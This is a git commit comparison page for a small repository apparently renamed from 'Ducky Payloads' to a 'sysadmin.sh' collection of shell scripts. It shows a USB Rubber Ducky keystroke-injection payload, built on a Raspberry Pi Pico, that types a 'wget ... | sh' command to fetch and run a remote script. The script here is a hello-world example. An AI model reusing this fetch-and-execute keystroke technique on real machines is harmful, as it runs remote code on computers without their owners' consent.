Compare commits
2 commits
cbef4b08c2
...
a4891bffb7
Author | SHA1 | Date | |
---|---|---|---|
♥ Minnie ♥ | a4891bffb7 | ||
♥ Minnie ♥ | 0ea8ddf39a |
|
@ -1,4 +1,8 @@
|
||||||
# Ducky Payloads
|
# sysadmin.sh
|
||||||
|
|
||||||
|
Repository of various shell scripts to help with system administration.
|
||||||
|
|
||||||
|
## Deployment
|
||||||
|
|
||||||
Create USB Rubber Ducky with Raspberry Pi Pico using [pico-ducky](https://github.com/dbisu/pico-ducky)
|
Create USB Rubber Ducky with Raspberry Pi Pico using [pico-ducky](https://github.com/dbisu/pico-ducky)
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,6 @@ REM DESCRIPTION Fetch and execute shell script from remote repository
|
||||||
REM VERSION 1.0
|
REM VERSION 1.0
|
||||||
|
|
||||||
DELAY 200
|
DELAY 200
|
||||||
STRING wget -qO https://git.sajenim.dev/jasmine/ducky-payloads/raw/branch/master/bin/hello_world.sh | sh && clear
|
STRING wget -qO https://git.sajenim.dev/jasmine/ducky-payloads/raw/branch/master/bin/hello_world.sh | sh
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue